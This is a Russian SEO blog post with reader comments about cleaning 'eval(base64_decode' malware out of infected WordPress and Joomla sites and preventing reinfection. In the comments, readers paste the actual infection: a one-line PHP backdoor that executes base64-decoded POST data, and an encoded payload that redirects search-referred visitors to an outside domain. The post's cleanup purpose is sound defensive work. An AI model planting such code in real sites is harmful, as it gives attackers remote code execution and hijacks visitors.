NiceSEO’s VKontakte Crossposter

Бесплатный плагин для Wordpress для автоматического кросспостинга в паблик ВКонтакте

Удаляем заразу: niceseo vs вирус eval(base64_decode). 1:0

Привет, дорогие друзья!

Тема сегодня актуальная, т.к. бушует эпидемияна сайте обнаружился вирус, который напихал фразу “eval(base64_decode” в кучу файлов? Ерунда, ща niceseo разберётся! 😉

Ну, во-первых, немного предыстории.

Сначала сразу несколько клиентов жаловались на падение позиций сайта в поисковиках, как показал первичный анализ, появились непонятные вирусы на сайтах, а также, что Opera и любимый наш Яндекс “предупреждают об опасности на странице”.

Затем Яндекс.Вебмастер стал мне слать письма о том, что и на моих личных сайтах также найден вирус.

Более тщательный анализ показал, зловредный код действительно имел место , и заключался он в функции:

и далее зашифрованный код.

Поэтому найти его очень просто, нужно поискать в файлах сайта строку “eval(base64_decode”.

Поискали? Нашли дофигища файлов? У меня на сайте proach.ru, например, обнаружилось почти 5000 файлов 🙂 :

Да уж. Ладно бы файлов было там 10-20, ну даже 100, удалили бы вручную и всё, но проблем фо ми. Но нет, 4870 файлов, из которых надо удалить зловредный код.

Делаем следующим образов: Скачиваем программку Text Replacer, и дальше думаю всё понятно:

Всё, из файлов сайта вирус удалён. Заливаем бэкап обратно на хостинг.

Кстати, хинт: Текст Реплэйсер может и не найти почему-то файлы, тогда фразу по частям ищем)

Но на этом излечение не заканчивается, нужно еще сделать дамп мускульной базы данных, поискать там на всякий случай злосчастную фразу, и тоже удалить, если есть.

Теперь точно всё, зараза удалена. Но как не допустить, чтобы снова она появилась?

В моём случае, например, сторонних доступов по FTP не было, поэтому появился вирус либо из-за уязвимостей в Joomla, либо из-за неправильно выставленных прав на папки (CHMOD).

Поэтому, КРАЙНЕ ВАЖНО, провести следующие профилактические действия: просканировать сайт на данную ерунду, обновить джумлу и проверить доступы к файлам/папкам, иначе велик шанс не только заполучить кучу левых ссылок, а то и реально вирус у себя на сайте, но и выпадение сайта из индекса Яндекса, а насколько это плохо – тут и дураку понятно.

За сим всё, здоровой жизни вашим сайтам, без вирусов. С вами был linur, niceseo.ru, до новых встреч!

Дополнение от нашего читателя: вирус также пихают нынче не только в php-файлы, но и в картинки! Будьте бдительны!)

Статью подготовил linur, Специально для NiceSEO.ru, 26 января 2012 года. При копировании не забывайте о ссылке на источник.
  • http://www.facebook.com/cerga2007 Ivanov Sergey

    Я еще сталкивался с eval(gzinflate(base64_decode…а вообще не думаю, что если встречается такой код, то это сразу вирус. могут и копирайты в такую ерунду кодировать =

  • Аноним

    Спасибо огромное! Очень помогла статья. Убрал вирус с ВП. Видимо, не зря плагин Antivirus указывал на eval(base64_decode

    • Аноним

      Рад помочь! надеюсь сайт у вас не выпал из яндекса хоть из-за вируса)

      • Erick Rimer

        Кстати, а не удалось ли установить, откуда приходит малварь? ВП вроде всегда старался исправно обновлять.

        • http://www.niceseo.ru/ob-avtore linur

          В моих случаях:
          1. Обычный троян утащил пароли к фтп из тотал коммандера
          2. Дырявые плагины к WordPress, так что будьте бдительны!

  • Kds77

    согласен наверное в джумле есть дыра .. у меня так же на двух сайтах этой хрени много появилось..

  • Lev196

    у меня тоже на сайте появилась такая зараза

  • Lev196

    я удалил заразу а как защитить от нее а то через сутки опять появляется кто подскажет?

    • Yura

      Посмотрите папку /images – есть ли там файл post.php

    • 5093336

      Сегодня побеждал эту проблему на своем сайте и практически уверен, что то, что Вы написали не сработает т.к. распространитель заразы вы не нашли, а боролись только с последствиями. Попробуйте поискать вот такой код с него все начинается

      • 5093336

        ?php if ($_POST[“php”]){eval(base64_decode($_POST[“php”]));exit;} ?

  • Сергей Владимирович

    Большое спасибо! У меня заразилось 5 сайтов на одном хостинге. Думаю, или подобрали пароль к админке джумлы (на одном сайте стоял слишком простой) или к ФТП…
    На втором хостинге нет заражения, так что как повезет.
    В итоге зараза была в 7209 файлах, причем в некоторых по несколько раз.

  • Rem!

    как любитель в подобных развлечений, могу сказать что такую штуку вшивают обычно в плагины, шаблоны, и прочее файлы сайта, которые вы качаете, советую еще смотреть функцию Exec тоже опасная) обычно как делают, в фанкшн скрипт который сует во все файлы этот эвал, ну и соответственно попадает на странице. Цель этого – вероятнее всего это получение холявных ссылок с вашего сайта, думаю не больше.
    PS это самое безобидная и распространенная хрень

  • Rem!

    Кстати строку можно разкодировать и глянуть что там

    • Imran

      а как разкодировать?

  • Lev196

    я раскодирывал удалил все что связано с base64_decode

  • Lev196

    и всеравно появился в других местах

  • Imran

    ?php eval(base64_decode(“DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmICghc3RyaXN0cigkdWFnLCJNU0lFIDcuMCIpKXsKaWYgKHN0cmlzdHIoJHJlZmVyZXIsInlhaG9vIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmluZyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsInJhbWJsZXIiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJnb2dvIikgb3Igc3RyaXN0cigkcmVmZXJlciwibGl2ZS5jb20iKW9yIHN0cmlzdHIoJHJlZmVyZXIsImFwb3J0Iikgb3Igc3RyaXN0cigkcmVmZXJlciwibmlnbWEiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ3ZWJhbHRhIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYmVndW4ucnUiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJzdHVtYmxldXBvbi5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJiaXQubHkiKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJ0aW55dXJsLmNvbSIpIG9yIHByZWdfbWF0Y2goIi95YW5kZXhcLnJ1XC95YW5kc2VhcmNoXD8oLio/KVwmbHJcPS8iLCRyZWZlcmVyKSBvciBwcmVnX21hdGNoICgiL2dvb2dsZVwuKC4qPylcL3VybFw/c2EvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vd3d3Ni51aW9wcXcuamt1Yi5jb20vIik7DQpleGl0KCk7DQp9Cn0KfQ0KfQ0KfQ==”));

  • Abstrat

    А можно ли эту программу (Text Replacer) или какую-нибудь другую использовать для уничтожения eval-заразы на сайтах, расположенных на сервере хостера?

    • http://www.niceseo.ru/ob-avtore linur

      Вообще нет, нужно бэкап качать, потом заливать.
      Но для подобных нужд я скриптик писал (на php), могу помочь вам удалить заразу, но только если сам доступ к FTP получу

      • Abstrat

        Беда в том, что удаленная зараза тут же восстанавливается, поэтому, пока не удавили источник, разовые мероприятия смысла не имеют – хоть как-то решала бы проблему программа, которую можно регулярно запускать и без особых хлопот очищать сайт на какое-то время.

        Я тут связался с разработчиками, они сказали, что такая возможность есть, если на сайте хостера создать виндовый диск. В cPanel есть такая опция как WebDisk, попробуем поискать счастья в этом направлении. Как Вы к этому относитесь?

        • http://www.niceseo.ru/ob-avtore linur

          Ну да, но тем не менее, проблема таки серьезная, и лучше не откладывать, пока сайт из индекса Яндекса не выпал, например.

          Могу взяться за проблему полностью, на платной основе, могу просто скриптиком своим помочь 🙂

          Нужен именно FTP к директории с файлами сайта, Webdisk это другое немного.

          Вообще разговор уже выходит за рамки комментариев, пишите на e-mail niceseo@niceseo.ru

  • Erick Rimer

    Большое спасибо автору! В чем суть проблемы знал, но не знал чем вычистить. Еще одна утилитка в набор бедному разработчику. Спасибо!!!

    • http://www.niceseo.ru/ob-avtore linur

      Вам спасибо 🙂 Вычистим всю заразу общими усилиями 😀

Я также состою в:
Лучшая веб-студия!
Яндекс.Метрика
© 2011-2017 NiceSeo.ru